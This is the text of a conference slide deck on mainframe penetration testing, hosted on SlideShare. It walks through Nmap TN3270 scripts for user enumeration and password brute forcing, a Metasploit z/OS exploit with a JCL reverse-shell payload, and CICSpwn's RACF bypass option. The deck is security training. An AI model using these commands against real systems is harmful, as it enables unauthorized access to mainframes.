SlideShare a Scribd company logo

Advanced mainframe hacking

P
Philip Young

Vanguard Compliance and Security class teaching how to use the various cybersecurity tools out there for mainframe hacking.

Technology
1 of 58
Download to read offline
VANGUARD SECURITY & COMPLIANCE 2016 Philip Young ZedSec 390 CST08 Advanced Mainframe Hacking SECURITY & COMPLIANCE CONFERENCE 2016
VANGUARD SECURITY & COMPLIANCE 2016 Disclaimer I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.
About Me!
VANGUARD SECURITY & COMPLIANCE 2016 Purpose This session will: • Go over the tools introduced in Mondays keynote • Explain what’s going on behind the scenes • Show you how to use the tools
VANGUARD SECURITY & COMPLIANCE 2016 Tools Covered • Nmap • Metasploit • CICSpwn • ELV.APF
VANGUARD SECURITY & COMPLIANCE 2016 Platform • Linux (Kali Linux) • Vmware • macOS • VPS
VANGUARD SECURITY & COMPLIANCE 2016 Kali Linux • A Linux distribution • Comes pre-loaded with multiple tools: • BURP • Metasploit • BeeF • Many more
DEMO
VANGUARD SECURITY & COMPLIANCE 2016 Nmap • Created in 1997 • By: Fyodor • Mostly ‘C’ • Includes Service Detection • Added Scripting Engine in ‘07
VANGUARD SECURITY & COMPLIANCE 2016 Nmap • Network MAP • Uses various techniques to discover open ports • E.G. “Syn Scan”
VANGUARD SECURITY & COMPLIANCE 2016 Service Probes • Identify what is running on a port • Uses TCP/UDP probes
VANGUARD SECURITY & COMPLIANCE 2016 Nmap Probes • Use the flag: ‘-sV’ • Null Probe: Matches data sent to Nmap • Approx 4,000 ‘Null Probes’ Let’s look at TN3270*: match tn3270 m|^xffxfdx1d| p/IBM Telnet TN3270/ i/3270-REGIME/ * line 4606 in nmap-service-probes
VANGUARD SECURITY & COMPLIANCE 2016 TN3270 Null Probe match -> ‘Match the following’ Tn3270 -> ‘with tn3270’ m|^xffxfdx1d| xffxfdx1d = IAC DO TN3270E p/IBM Telnet TN3270/ = Set to ‘IBM Telnet…’
VANGUARD SECURITY & COMPLIANCE 2016 Other Probes • TCP Probes • Send Data, inspect reply • For example Network Job Entry Probe:
VANGUARD SECURITY & COMPLIANCE 2016 NJE Probe • Sends an invalid NJE ‘OPEN’ packet • Waits for either ‘ACK’ or ‘NAK’ in EBCDIC
Nmap without Service Probes
Nmap WITH Service Probes
VANGUARD SECURITY & COMPLIANCE 2016 Nmap Scripting Engine (NSE) • Composed of Libraries and scripts • Over 530 scripts available • 121 Libraries • Uses Lua
VANGUARD SECURITY & COMPLIANCE 2016 NSE Categories AUTH BROADCAST BRUTE DEFAULT DISCOVERY DOS EXPLOIT EXTERNAL FUZZER INTRUSIVE MALWARE SAFE VERSION VULN
VANGUARD SECURITY & COMPLIANCE 2016 TN3270 NSE Library • A ‘virtual’ TN3270 terminal written in Lua • Available: https://github.com/ zedsec390/NMAP • Allows for the following:
VANGUARD SECURITY & COMPLIANCE 2016 Invoke • To invoke scripts use the flag --script ( is line continuation in linux) nmap -sV --script tn3270-screen
VANGUARD SECURITY & COMPLIANCE 2016 Additional TN3270 Scripts • VTAM Applid Enumeration • TSO: • User ID EnumeraFon • Password Brute Force • CICS: • TransacFon EnumeraFon • User ID EnumeraFon • User Password Brute Forcing
VANGUARD SECURITY & COMPLIANCE 2016 Additional TN3270 Scripts • VTAM Applid Enumeration • TSO: • User ID EnumeraFon • Password Brute Force • CICS: • TransacFon EnumeraFon • User ID EnumeraFon • User Password Brute Forcing
VANGUARD SECURITY & COMPLIANCE 2016 TSO User Enumeration • Let’s walk through the arguments: •  Note the Libraries: brute & unpwdb Argument Defini5on brute.maxthreads=100 Max number of concurrent connecFons. Set to 100. userdb=‘/tmp/users.txt’ File with usernames you want to test. tso-enum.commands=‘TSOL5’ The command used to get to TSO.
VANGUARD SECURITY & COMPLIANCE 2016 CICS Transaction Enumeration Argument Defini5on brute.maxthreads=100 Max number of concurrent connecFons. Set to 100. idlist=‘/tmp/users.txt’ File with CICS transacFons you’re looking for. cics-enum.commands=‘CICSTS29’ The command used to get to the CICS region. cics-enum.path=‘/home/test’ Successfully idenFfied transacFon screenshots will be placed in this folder.
DEMO
VANGUARD SECURITY & COMPLIANCE 2016 Metasploit Framework • Developed by H.D. Moore 2003 • Moved to Ruby in 2007 • Created an easy to use exploit platform • Chad Rikansrud (@bigendiansmalls) add JCL and z/OS architecture support in 2016
VANGUARD SECURITY & COMPLIANCE 2016 Using MSF • Run ‘msfconsole’ • To list all exploits: show exploits • Run the ONLY z/os ‘exploit’ use exploit/mainframe/ftp/ftp_jcl_creds • Show the options with: show options • Fill in the options you need • Select which ‘payload’ you want to use
VANGUARD SECURITY & COMPLIANCE 2016 Set options • Exploit options: Op5on Defini5on FTPUSER User ID to use. FTPPASS Password to use. RHOST FTP Hostname/IP address of target LPAR RPORT FTP port (use Nmap)
VANGUARD SECURITY & COMPLIANCE 2016 Metasploit Payload Options Now select a payload: set payload cmd/mainframe/reverse_shell_jcl Change the payload options: Op5on Defini5on LHOST Our Hostname or IP address LPORT The port you want metasploit to open a listener on.
DEMO
VANGUARD SECURITY & COMPLIANCE 2016 CICSpwn • Release this year by Ayoul • Relies on CEMT/CEDA transaction IDs (for now) • Uses CEMT to upload and execute JCL/REXX • Can be used to assess CICS and break in to environments • Requires Python 2.7
VANGUARD SECURITY & COMPLIANCE 2016 Interesting Options Invoke with: python cicspwn Flag Defini5on -i Gather informaFon -A Test all opFons -s Upload JCL to be executed by CICS user (requires CEMT) --bypass Will bypass RACF if CEDA is available.
DEMO
Where To From Here?
VANGUARD SECURITY & COMPLIANCE 2016 Escalation • So far only network based • What happens after access is granted?
VANGUARD SECURITY & COMPLIANCE 2016 Some Ideas • Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit) • Automated APF tools to attempt privilege escalation through zapping APF authorized modules • Data dumping tools to grab all datasets • SMP/E corruption
VANGUARD SECURITY & COMPLIANCE 2016 Why Not? • Make your own tools? I’d prefer the tools come with what the experts need, so they have it without knowing about it
Contact: mainframed767@ gmail.com @mainframed767
VANGUARD SECURITY & COMPLIANCE 2016 Thank you! SECURITY & COMPLIANCE CONFERENCE 2016

Recommended

Philip young current state of mainframe hacking - vanguard - 101016
Philip young current state of mainframe hacking - vanguard - 101016Philip young current state of mainframe hacking - vanguard - 101016
Philip young current state of mainframe hacking - vanguard - 101016Philip Young
 
Vulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based ApplicationVulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based ApplicationSensePost
 
Ansible Playbook
Ansible PlaybookAnsible Playbook
Ansible PlaybookKnoldus Inc.
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Best practices for ansible
Best practices for ansibleBest practices for ansible
Best practices for ansibleGeorge Shuklin
 
Ansible Tower
Ansible TowerAnsible Tower
Ansible TowerKnoldus Inc.
 
Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方
Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方
Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方tshiroyama
 
Cloud security
Cloud securityCloud security
Cloud securityPurva Dublay
 

Recommended

Philip young current state of mainframe hacking - vanguard - 101016
Philip young current state of mainframe hacking - vanguard - 101016Philip young current state of mainframe hacking - vanguard - 101016
Philip young current state of mainframe hacking - vanguard - 101016Philip Young
 
Vulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based ApplicationVulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based ApplicationSensePost
 
Ansible Playbook
Ansible PlaybookAnsible Playbook
Ansible PlaybookKnoldus Inc.
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Best practices for ansible
Best practices for ansibleBest practices for ansible
Best practices for ansibleGeorge Shuklin
 
Ansible Tower
Ansible TowerAnsible Tower
Ansible TowerKnoldus Inc.
 
Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方
Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方
Backdoor!! vmware-tools と 統合サービスに見るハイパーバイザの呼び出し方tshiroyama
 
Cloud security
Cloud securityCloud security
Cloud securityPurva Dublay
 
Ansible
AnsibleAnsible
AnsibleKnoldus Inc.
 
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Sneeker Yeh
 
Linux admin interview questions
Linux admin interview questionsLinux admin interview questions
Linux admin interview questionsKavya Sri
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Blue Teamer
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container SecurityPhil Estes
 
IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?David Ware
 
Linux Preempt-RT Internals
Linux Preempt-RT InternalsLinux Preempt-RT Internals
Linux Preempt-RT Internals哲豪 康哲豪
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
Vagrant
Vagrant Vagrant
Vagrant Akshay Siwal
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentationSuresh Kumar
 
Ansible Introduction
Ansible Introduction Ansible Introduction
Ansible Introduction Robert Reiz
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellHishan Shouketh
 
Kubernetes 101 and Fun
Kubernetes 101 and FunKubernetes 101 and Fun
Kubernetes 101 and FunMario-Leander Reimer
 
Vagrant 101 Workshop
Vagrant 101 WorkshopVagrant 101 Workshop
Vagrant 101 WorkshopLiora Milbaum
 
Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Adam Englander
 
FreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sFreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sChien Cheng Wu
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
 
Advanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAdvanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAlan Renouf
 
Ansible
AnsibleAnsible
AnsibleVishal Yadav
 
Linux Systems Performance 2016
Linux Systems Performance 2016Linux Systems Performance 2016
Linux Systems Performance 2016Brendan Gregg
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB
 

More Related Content

What's hot

Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Sneeker Yeh
 
Linux admin interview questions
Linux admin interview questionsLinux admin interview questions
Linux admin interview questionsKavya Sri
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Blue Teamer
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container SecurityPhil Estes
 
IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?David Ware
 
Linux Preempt-RT Internals
Linux Preempt-RT InternalsLinux Preempt-RT Internals
Linux Preempt-RT Internals哲豪 康哲豪
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentationSuresh Kumar
 
Ansible Introduction
Ansible Introduction Ansible Introduction
Ansible Introduction Robert Reiz
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellHishan Shouketh
 
Vagrant 101 Workshop
Vagrant 101 WorkshopVagrant 101 Workshop
Vagrant 101 WorkshopLiora Milbaum
 
Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Adam Englander
 
FreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sFreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sChien Cheng Wu
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
 
Advanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAdvanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAlan Renouf
 
Linux Systems Performance 2016
Linux Systems Performance 2016Linux Systems Performance 2016
Linux Systems Performance 2016Brendan Gregg
 

What's hot (20)

Ansible
AnsibleAnsible
Ansible
 
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
 
Linux admin interview questions
Linux admin interview questionsLinux admin interview questions
Linux admin interview questions
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
 
IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?
 
Linux Preempt-RT Internals
Linux Preempt-RT InternalsLinux Preempt-RT Internals
Linux Preempt-RT Internals
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with Ansible
 
Vagrant
Vagrant Vagrant
Vagrant
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentation
 
Ansible Introduction
Ansible Introduction Ansible Introduction
Ansible Introduction
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
 
Kubernetes 101 and Fun
Kubernetes 101 and FunKubernetes 101 and Fun
Kubernetes 101 and Fun
 
Vagrant 101 Workshop
Vagrant 101 WorkshopVagrant 101 Workshop
Vagrant 101 Workshop
 
Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Practical API Security - PyCon 2018
Practical API Security - PyCon 2018
 
FreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sFreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8s
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
 
Advanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAdvanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtop
 
Ansible
AnsibleAnsible
Ansible
 
Linux Systems Performance 2016
Linux Systems Performance 2016Linux Systems Performance 2016
Linux Systems Performance 2016
 

Similar to Advanced mainframe hacking

MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesFelipe Prado
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...Amazon Web Services
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationTriNimbus
 
Compliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing FrameworkCompliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing FrameworkSonatype
 
Securing the cloud
Securing the cloudSecuring the cloud
Securing the cloudZIONSECURITY
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
ASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment ScenariosASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment ScenariosCisco Canada
 
Splunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout SessionSplunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout SessionSplunk
 
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Amazon Web Services
 
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...SBWebinars
 
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinOSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinNETWAYS
 
SNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSven Nierlein
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1Felipe Prado
 
Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Guy Podjarny
 

Similar to Advanced mainframe hacking (20)

MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Miranda
MirandaMiranda
Miranda
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
 
Compliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing FrameworkCompliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing Framework
 
Securing the cloud
Securing the cloudSecuring the cloud
Securing the cloud
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
ASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment ScenariosASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment Scenarios
 
Splunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout SessionSplunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout Session
 
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
 
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
 
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinOSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
 
SNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agent
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
 
Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?
 

Recently uploaded

[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....rightmanforbloodline
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAnitaRaj43
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityVictorSzoltysek
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfdanishmna97
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightSafe Software
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
